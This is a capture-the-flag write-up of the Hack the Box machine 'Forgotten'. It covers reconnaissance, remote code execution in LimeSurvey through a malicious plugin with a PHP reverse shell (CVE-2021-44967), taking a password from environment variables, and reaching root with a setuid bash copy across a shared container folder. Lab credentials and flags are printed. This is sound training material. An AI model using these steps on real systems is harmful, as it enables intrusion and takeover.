Forgotten - Hack the Box (Linux)

MaskedArtist · 2025-10-20T13:29:43+00:00

Recon Port Scan SSH (22/tcp): OpenSSH 8.9p1 running on an Ubuntu host. Host keys were returned (ECDSA and ED25519). This indicates SSH is available — useful...

MaskedArtist

Recon

Port Scan

SSH (22/tcp): OpenSSH 8.9p1 running on an Ubuntu host. Host keys were returned (ECDSA and ED25519). This indicates SSH is available — useful for later lateral access if credentials or private keys are obtained.

HTTP (80/tcp): Apache 2.4.56 (Debian). The HTTP service currently returns 403 Forbidden for the base URL, so the webserver is running but directory/index access is restricted. The Service Info shows the host IP (172.17.0.2) which may be an internal/container address — check for virtual hosts or Host header-based routing.

22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 28:c7:f1:96:f9:53:64:11:f8:70:55:68:0b:e5:3c:22 (ECDSA)
|_  256 02:43:d2:ba:4e:87:de:77:72:ce:5a:fa:86:5c:0d:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.56
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Directory Brute Forcing

/survey               (Status: 301) [Size: 315] [--> http://forgotten.htb/survey/]
/server-status        (Status: 403) [Size: 278]

Web page

Start Installation
We need to create a DB from ourself that does not have any DB

With the same given details we need to create a DB.

MariaDB [(none)]> CREATE DATABASE limedb;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> CREATE USER 'john'@'%' IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.011 sec)

MariaDB [(none)]> GRANT SELECT, CREATE, INSERT, UPDATE, DELETE, ALTER, DROP, INDEX ON limedb.* TO 'john'@'%';
Query OK, 0 rows affected (0.001 sec)

MariaDB [(none)]> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.001 sec)

MariaDB [(none)]>

Now change bind-address to 0.0.0.0 in /etc/mysql/mariadb.conf.d/50-server.cnf
Check if the port is listening.

Initial Foothold

RCE

Finding exploit for LimeSurvey Community Edition Version 6.3.7+231127 and there is one CVE-2021-44967

git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

Edit config.xml add line <version>6.0</version>

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>Y1LD1R1M</name>
        <type>plugin</type>
        <creationDate>2020-03-20</creationDate>
        <lastUpdate>2020-03-31</lastUpdate>
        <author>Y1LD1R1M</author>
        <authorUrl>https://github.com/Y1LD1R1M-1337</authorUrl>
        <supportUrl>https://github.com/Y1LD1R1M-1337</supportUrl>
        <version>5.0</version>
        <license>GNU General Public License version 2 or later</license>
        <description>
                <![CDATA[Author : Y1LD1R1M]]></description>
    </metadata>

    <compatibility>
        <version>3.0</version>
        <version>4.0</version>
        <version>5.0</version>
        <version>6.0</version>
    </compatibility>
    <updaters disabled="disabled"></updaters>
</config>

In php-rev.php change the IP and Port
Now Zip the the file ie the config file and php file.
Upload and install the ZIP file in plugin.
RCE using http://forgotten.htb/survey/upload/plugins/Y1LD1R1M/php-rev.php

The env command lists all current environment variables, including any passwords stored in them.

HOSTNAME=efaa6f5097ed
PHP_VERSION=8.0.30
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 BFDDD28642824F8118EF77909B67A5C12229118F 2C16C765DBE54A088130F1BC4B9B5F600B55F3B4 39B641343D8C104B2B146DC3F9C39DC0B9698544
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/home/limesvc
APACHE_LOG_DIR=/var/log/apache2
LANG=C
LS_COLORS=
PHP_SHA256=216ab305737a5d392107112d618a755dc5df42058226f1670e9db90e77d777d9
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PHPIZE_DEPS=autoconf            dpkg-dev                file            g++     gcc              libc-dev                make            pkg-config              re2c
LIMESURVEY_PASS=5W5HN4K4GCXf9E
PHP_URL=https://www.php.net/distributions/php-8.0.30.tar.xz
LIMESURVEY_ADMIN=limesvc
APACHE_RUN_GROUP=limesvc
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=1
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=limesvc
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHP_ASC_URL=https://www.php.net/distributions/php-8.0.30.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
OLDPWD=/home
_=/usr/bin/env

Got user name and password 5W5HN4K4GCXf9E
Local Enumeration

Connect using SSH will have the user.txt

9636d19ccb4cba6f41314e70dc62a959

Privilege Escalation

Tried Various escalation method but didn’t work out.
Now there are two shell one is from RCE and other is from SHH.
Switching to root in remote shell.
Now copy /bin/bash to /var/www/html/survey/user.
Changing the permission chmod 6777 user.
Now in SSH ie the contained go to /opt/limesurvey.
Execute ./user.

Now read cat /root/root.txt for flag

0098e59b27c988da6ee263d58c5dae99